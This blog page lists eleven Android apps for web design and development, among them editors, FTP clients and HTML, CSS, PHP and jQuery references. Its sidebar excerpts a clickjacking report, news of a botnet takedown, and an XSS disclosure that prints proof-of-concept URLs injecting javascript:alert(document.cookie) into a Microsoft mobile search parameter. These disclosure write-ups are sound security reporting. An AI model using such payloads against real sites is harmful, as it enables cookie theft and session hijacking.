Skip to main content

Top Android Apps for Learning Web Design


1. Android Web Editor

You can create an HTML or PHP page with this app or edit an existing one. Other features include:
  • Code highlighting;
  • Work with your FTP server;
  • Work with files in your smartphone;
  • Line numbering;
  • Hot tags-button;
  • Quick preview of your page;
  • Highlighting the current line;
  • Running your code on our server; (You can debug your php code!)
  • Encoding choice.
  • Search by code.
  • AUTO Encoding choise.
  • Undo/redo.
  • Changes set of hot keys.

2. SilverEdit

Create and edit pages in online or offline mode, manage, upload or download files through FTP.

3. AndFTP

An FTP client that lets you upload and download files, supports RSA and DSH keys for SSH, More features include SCP support, folder synchronization, custom commands and import settings from file.

4. HTML5 Reference

This app lists down all the HTML5 attributes along with their descriptions in a handy cheatsheet format.

5. PHP Reference

Find all the PHP attributes and their description into a cheatsheet.

6. CSS Reference

A complete list of CSS references.

7. jQuery Reference

Provides you all jQuery syntax and attributes for a better knowledge.

8. View Web Source

This app lets you view the source code of any webpage, as well as copy and paste the HTML codes.

9. Dev Pocket Reference - jQuery

NEW JQUERY v1.7 New jQuery v1.7 Developer Pocket Reference jQuery is package of DPR series in attempt to provide references guidance for developer on palm.This DPR jQuery is free and provides a complete and comprehensive manual reference.IF YOU LIKE IT, PLEASE KINDLY GIVE ME YOUR FEEDBACK, RATE AND COMMENT FOR FUTHER INPUT AND UPDATE.THANKS.features search function ExamplesSource:jQuery.com



10. WebMaster's Html Editer Lite


Application like this is very useful for all web developers.  Webmaster’s HTML Editor Lite is a source code editor that supports HTML, PHP, JS, and CSS editor – all of these are essential in programming and develop a strong site.


11. mAnalytics

Web Designers and Developers needed to manage site with help from Google Analytics. In short, mAnalytics is a perfect medium in launching sites through Google analytic account. This application is also convenient to free workers- it supports all Android mobile devices so Google analytic is manageable anywhere you are.



Aside from good graphics and designs, website needed to be visible in all search engines. WeRank SEO Application is very applicable in keyword tracking for search visibility purposes.

Comments

Popular posts from this blog

Click-jacking or UI Redressing

Hi! Just want to share my finding, I have found Click-jacking or UI Redressing Vulnerability in   on Google Map , enjoy ;-) This bug was reported to Google Security Team, fixed immediately. About Title:  ClickJacking or UI Redressing on Google Map Business Risk: Normal Discovery Date: October 8, 2013 Author: Jitendra Jaiswal (me) Poc Details   Impact On victim :  1. attacker change victim profile pic by useing his webcam and upload 2. update status acording to attacker Best, Jeet Jaiswal

Microsoft remotely deleted Tor-based 'Sefnit Botnet' from more than 2 Million Systems

In October 2013,  Microsoft  adopted a silent, offensive method to tackle infection due to a Tor-based botnet malware called ' Sefnit '. In an effort to  takedown of the  Sefnit botnet  to protect windows users, Microsoft r emotely removes the older versions of installed Tor Browser software and infection from 2 Million systems, even without the knowledge of the system's owner. Last year in August, after Snowden revelations about the National Security Agency's ( NSA ) Spying programs, the Internet users were under fear of being spied. During the same time Tor Project leaders noticed almost 600% increase in the number of users over the anonymizing networks of Tor i.e. More than 600,000 users join Tor within few weeks. In September, researchers identified the major reason of increased Tor users i.e. A Tor-based botnet called ' Sefnit malware ', which was infecting millions of computers for click fraud and  bitcoin ...

xss in Microsoft mobile domain

Cookies xss in Microsoft mobile domain also it have xframe open vulnerability for click jacking Domain: m.microsoft.com Poc url steps for reproduce issue are same in both url so I am send both url and steps by using one of them Poc urls : 1.          http://m.microsoft.com/showcase/en/US/Search.mspx?a=results&mid=3900&phrase=%5burl%3djavascript:alert(document.cookie)%5dClick%20here%20to%20see%20Result%5b/url%5d&Search = 2.        http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] Vulnerable parameter: phrase= Steps for reproduce issue Poc url http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] when users use url .That give a result in Microsoft site lik...